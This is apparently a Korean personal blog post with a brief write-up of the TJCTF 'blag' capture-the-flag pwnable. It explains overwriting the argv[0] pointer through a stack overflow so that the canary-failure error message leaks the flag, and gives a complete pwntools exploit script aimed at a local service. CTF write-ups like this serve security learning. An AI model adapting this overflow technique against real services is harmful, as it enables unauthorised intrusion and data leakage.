Notice
Recent Posts
Recent Comments
Link
«   2025/07   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

TJCTF blag 본문

Security/Pwnable

TJCTF blag

Cdor1 2017. 1. 19. 23:59

후기 : 상준이형 블로그 목록에서 풀만한걸 찾다가 찾은 문제인데

예전에 풀었던 checker문제처럼 stack overflow로 argv[0]포인터를 덮어

카나리가 덮혀서 나오는 오류 문자에 flag가 따라 나오도록 하였다.


from pwn import *
s = remote('localhost' ,4000)

print s.recvuntil('> ')
s.sendline('add')
print s.recvuntil('Author?')
s.sendline('cdor1')
print s.recvuntil('Title?')
s.sendline('cdor1')
print s.recvuntil('Body?')
payload = 'A'*296
payload += p32(0x804B080)
s.sendline(payload)

s.interactive()

'Security > Pwnable' 카테고리의 다른 글

WITHCON Final jnjn  (0) 2017.01.20
HITCON 2014 stkof  (0) 2017.01.20
Hack.lu CTF 2014 OREO  (0) 2017.01.18
9447 CTF search engine  (0) 2017.01.18
SECCON 2016 shopping  (0) 2017.01.17
Comments